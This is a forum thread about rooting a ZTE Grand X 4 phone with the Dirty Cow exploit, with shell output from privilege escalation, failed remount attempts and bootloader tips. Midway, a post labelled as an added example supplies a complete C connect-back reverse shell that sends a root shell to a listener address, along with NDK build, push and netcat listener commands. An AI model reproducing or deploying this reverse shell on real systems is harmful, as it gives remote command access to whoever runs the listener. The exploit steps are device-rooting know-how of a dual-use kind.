ZTE Grand X 4 - Rooting Progress


scitrice

Member
Jan 28, 2017
5
8
This thread is made in an effort to root the ZTE Grand X 4 (Z957). At this point I've made some progress by using the Dirty Cow exploit to access a root shell via ADB, but have been unable to install su to the system partition.

Notes: stock rom, no custom recovery.

Exploit method:
Follow the instructions posted by Arinerron on GitHub regarding CVE-2016-5195 (under 10 posts, cannot share direct link)
When successful you will see "root@financier:/ #" as your shell prompt, however the session will hang after any command. That said, /system/run-as is still updated allowing you to do the following:

$ adb shell
shell@financier:/ $ run-as
uid run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
shell@financier:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0

You have access to the Android system as root within this shell, but this is where I'm getting stuck. I'm not able to find a way to mount the system partition as read/write, and as such I am unable to install su. Also note that you will need to run the exploit again any time you reboot the device. I have tried the following methods:

$ adb shell cp /sdcard/Download/su /system/bin/su
cp: /system/bin/su: Read-only file system

shell@financier:/ # mount -o rw,remount /system
mount: Permission denied

adb reboot disemmcwp
#still unable to remount the system partition

At this point I'll share what I've been able to do so far and see if anyone else has ideas for a next step.
 

egalambos

Member
Jul 29, 2010
38
4
Moto G 5G
This worked on my ZTE GrandX Max Plus to permanently disable the write protection on the system partition.

Good luck!!

reboot disemmcwp

If you ever want to re-enable being blocked from mounting system rw:

reboot emmcwpenab
 

JCEWL93

Member
Jan 3, 2012
13
5
Any luck on this root? I am looking to buy a phone on Cricket, but I need one that I can root.
 

kbtech

New member
Feb 5, 2017
3
1
Bump, I've tried but I also get stuck on the same three methods:

$ adb shell cp /sdcard/Download/su /system/bin/su
cp: /system/bin/su: Read-only file system

shell@financier:/ # mount -o rw,remount /system
mount: Permission denied

adb reboot disemmcwp
#still unable to remount the system partition
 

scitrice

Member
Jan 28, 2017
5
8
Thought I would post an update: Still no success on my end.

"Rooting" is easy, but breaking out of the SELinux context to do anything is hard. I.e., I expanded on timwr/CVE-2016-5195 by trying to use vikiroot to break out of the u:r:shell:s0 context. To do this, adb push the vikiroot exploit to /data/local/tmp and then use the timwr method to run that exploit as root:
shell@financier:/ # /data/local/tmp/exploit
Unfortunately I could only get the reverse shell to work as a glorified echo. If anyone knows where I could find some C++ code for running a shell in Android for me to work off of, I'm willing to see how much further I can get in that direction.

As disemmcwp doesn't work I'm wondering if ZTE found a different way to lock down the system partition? Interestingly there is an OEM-specific settings button that is greyed out (find it at *#*#4636#*#*).

I'm running firmware from Wind/Freedom Mobile so I can access the bootloader and unlock it, but I can't install SU or anything from stock. Additionally, there is no TWRP released for this phone yet. I have no idea where to find the board config files for this phone. Without a custom bootloader I'm not sure how to make permanent changes to the rom at this point.
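Since the post above asks for shell-spawning code to work from, here is an added example; it is not from this thread, from vikiroot or from timwr's repository, and the listener address and port are placeholders you pass on the command line. It shows the plumbing that usually turns a "reverse shell" into a "glorified echo": the socket has to be dup2()'d onto fds 0, 1 and 2 before exec'ing the shell, otherwise the shell reads commands from the socket but its output goes to the original stdout, or the program ends up relaying bytes itself. It also includes a self-test that drives the same code over a local socketpair, so you can check it on a PC before cross-compiling with the NDK and pushing it to /data/local/tmp. What this does not do is change the SELinux domain: a shell exec'd from u:r:shell:s0 inherits u:r:shell:s0, so it is still subject to the same mount denial seen earlier in the thread.

```c
/* Added example, not code from the thread. Minimal connect-back shell for
 * Linux/Android: connect to <ip> <port>, bind the socket to stdin/stdout/
 * stderr, exec the shell. Build for the device with the NDK, e.g.
 *   $NDK/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi21-clang -static -o rsh rsh.c
 * then: adb push rsh /data/local/tmp && adb shell chmod 755 /data/local/tmp/rsh
 * and, from the root shell:  /data/local/tmp/rsh 192.0.2.10 4444   (placeholder IP/port)
 */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

#define ANDROID_SH "/system/bin/sh"   /* stock Android shell; /bin/sh on a PC */

/* Replace the current process with `shell`, with fds 0/1/2 bound to `fd`.
 * Only returns on failure (-1). The SELinux domain is inherited unchanged. */
int spawn_shell_on_fd(int fd, const char *shell)
{
    if (dup2(fd, STDIN_FILENO) < 0 || dup2(fd, STDOUT_FILENO) < 0 ||
        dup2(fd, STDERR_FILENO) < 0)
        return -1;
    if (fd > STDERR_FILENO)
        close(fd);                     /* the three dups keep the socket alive */
    char *const argv[] = { (char *)shell, NULL };
    execv(shell, argv);
    return -1;                         /* execv only returns on error */
}

/* TCP connect to host:port (IPv4 dotted quad). Returns the socket or -1. */
int connect_back(const char *host, unsigned short port)
{
    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return -1;
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    if (inet_pton(AF_INET, host, &sa.sin_addr) != 1 ||
        connect(s, (struct sockaddr *)&sa, sizeof sa) < 0) {
        close(s);
        return -1;
    }
    return s;
}

/* Fork, and in the child exec `shell` on `fd`. Parent gets the pid or -1. */
pid_t run_shell_over_fd(int fd, const char *shell)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        spawn_shell_on_fd(fd, shell);
        _exit(127);
    }
    return pid;
}

/* Self-test with no network: talk to a shell over a socketpair and check
 * that its output comes back over the same socket. Returns 1 on success. */
int selftest_over_socketpair(const char *shell)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
        return 0;
    pid_t pid = run_shell_over_fd(sv[1], shell);
    close(sv[1]);                      /* child holds its own copies as 0/1/2 */
    if (pid < 0) { close(sv[0]); return 0; }
    const char cmd[] = "echo probe-$((6*7))\nexit 0\n";   /* constructed input */
    if (write(sv[0], cmd, sizeof cmd - 1) != (ssize_t)(sizeof cmd - 1)) {
        close(sv[0]);
        return 0;
    }
    char buf[256];
    size_t n = 0;
    ssize_t r;
    while (n < sizeof buf - 1 && (r = read(sv[0], buf + n, sizeof buf - 1 - n)) > 0)
        n += (size_t)r;                /* EOF once the shell exits and fds 0/1/2 close */
    buf[n] = '\0';
    close(sv[0]);
    int status = 0;
    waitpid(pid, &status, 0);
    return strstr(buf, "probe-42") != NULL && WIFEXITED(status) && WEXITSTATUS(status) == 0;
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s <listener-ip> <port>\n", argv[0]);
        return 2;
    }
    int s = connect_back(argv[1], (unsigned short)atoi(argv[2]));
    if (s < 0) { perror("connect_back"); return 1; }
    spawn_shell_on_fd(s, ANDROID_SH);
    perror("execv");                   /* only reached if exec failed */
    return 1;
}
```

On the listener side a plain `nc -l -p 4444` is enough. If you want to see what the spawned shell is allowed to do, run `id` and `cat /proc/self/attr/current` in it first: uid 0 with context u:r:shell:s0 is the same confined root the thread already has, which is why the remount still fails.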
 

Mazaris

New member
Mar 30, 2017
3
0
I've tried many different ways to root this phone. For weeks, I've tried. Nothing. I personally think that there is no way to, not now at least.
 

kbtech

New member
Feb 5, 2017
3
1
Don't know if this will help, but I found that they lock the bootloader under the developer settings!
 

dragonh1

New member
Apr 28, 2017
1
0
Has anyone tried a one click root application like KingoRoot ?
Or is this more for doing it on your own without a service like that?
 

scitrice

Member
Jan 28, 2017
5
8
Previously I had tried a series of one click solutions but I haven't found any that support this device yet. Typically they use the same exploits we've tried to use the hard way ;)

After slacking for awhile I was finally able to poke around some of the internals of the phone in FTM mode using qualcomm developer tools. Lots of nifty things in the embedded file system and plenty of opportunities to flash new boot loaders and roms to the device for those of you who have a locked bootloader, but unfortunately I haven't been able to extract a copy of the stock rom or bootloaders. I'm still lacking the information I need to compile a new one for the phone.

Where I stand:
Can create a root shell, cannot remount system as read/write for permanent root in stock rom.
Can install new boot loader, no twrp or other found for this hardware.
Can compile new twrp, no boardconfig files (handy to avoid bricking your phone)
Can explore EFS and access chip via FTM, not sure how or if possible to download current rom / bootloader from here.

Happy for any tips on what to try next!
 

scitrice

Member
Jan 28, 2017
5
8
If you can get those tools off of the site maybe I'll message you about grabbing a few items on my Christmas list! QPST includes the tools necessary, and the tools to back up the 425 should you accidentally brick your phone (basically impossible to truly brick a Qualcomm if you have the right tools). Archive.org has a copy; I don't remember where to find the driver pack but you'll need that too (and a Windows build).

Read through some notes on Marshmallow and it sounds like you have to remount system from recovery. I'm camping for the next month but will try talking to the TWRP team about porting a bootloader to the phone when I get back.

Let me know if you make any headway!
 

wchriseg

Member
Jul 17, 2007
5
5
Try this adb command and see if you get a Qualcomm serial port after reboot
Code:
adb reboot edl
If that doesn't work, try
Code:
adb reboot bootloader
then run the attached.
 

Attachments: Fastboot_edl-v2.zip (217.2 KB)

paindaddi

Member
Mar 25, 2017
15
2
How's everyone here? I also am awaiting root for this device. It really needs some shine on its mid-levelness. So here is my friend's ZTE Warp 7 work for root. He also got some killer ROMs for the Huawei Ascend XT. He does great work. I'm sure if he had a Grand X 4 he could move this along. Just a suggestion. This man can get this done. Just a suggestion for all of us. https://xdaforums.com/showpost.php?p=72560392&postcount=246


https://xdaforums.com/member.php?u=7934375
 

Message madvane, he could help.